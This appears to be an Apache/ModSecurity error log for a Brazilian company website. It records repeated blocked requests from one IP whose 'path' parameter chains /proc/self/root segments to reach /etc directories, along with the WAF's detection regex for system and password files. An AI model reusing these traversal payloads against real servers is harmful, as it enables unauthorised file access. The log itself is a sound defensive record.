[Mon Mar 16 14:01:13.262935 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:54776] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3Wf9ocpUE4ed4uDz2TwAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:14.526072 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.243.203:54780] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3Wv9ocpUE4ed4uDz2UQAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:17.107470 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.243.203:54794] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3XbysWC90G-1nBrBL1gAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:18.475762 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.243.203:54806] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3Xo6lpbStxTqkSktzUAAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:19.695083 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:54818] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3X46lpbStxTqkSktzUgAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:24.171670 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.243.203:54406] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3ZJqj1wV0Si-Okef19AAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:25.469824 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.243.203:54420] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3ZVajLEzk2WiQ-10ZIwAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:26.795798 2026] [:error] [pid 11972:tid 140411574073088] [client 74.7.243.203:54428] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3Zpqj1wV0Si-Okef19QAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:28.307284 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.243.203:54430] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3aLysWC90G-1nBrBL2QAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:29.688303 2026] [:error] [pid 14895:tid 140411658000128] [client 74.7.243.203:54446] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3aVajLEzk2WiQ-10ZJAAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:33.263323 2026] [:error] [pid 14895:tid 140411590858496] [client 74.7.243.203:46114] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3bVajLEzk2WiQ-10ZJwAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:34.603338 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.243.203:46122] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3brABkC4fWIHEf8H1eQAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:35.767342 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:46124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3b_9ocpUE4ed4uDz2VgAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:37.116073 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.243.203:46140] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3cdSswJuvopo3lOhluwAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:39.999681 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.243.203:46144] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3c7ABkC4fWIHEf8H1fQAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:41.312444 2026] [:error] [pid 14895:tid 140411733534464] [client 74.7.243.203:36410] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3dVajLEzk2WiQ-10ZLAAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:44.005515 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.243.203:36414] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3eFajLEzk2WiQ-10ZLwAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:45.330291 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.243.203:36420] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3eVajLEzk2WiQ-10ZMAAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:48.724115 2026] [:error] [pid 14895:tid 140411590858496] [client 74.7.243.203:36432] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3fFajLEzk2WiQ-10ZNAAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:50.051071 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.243.203:36442] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3fo6lpbStxTqkSktzXAAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:51.664863 2026] [:error] [pid 15061:tid 140411691570944] [client 74.7.243.203:37786] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3f6TCbgAP5jq5TegxzQAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:56.272017 2026] [:error] [pid 11972:tid 140411708356352] [client 74.7.243.203:37794] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3hJqj1wV0Si-Okef1_gAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
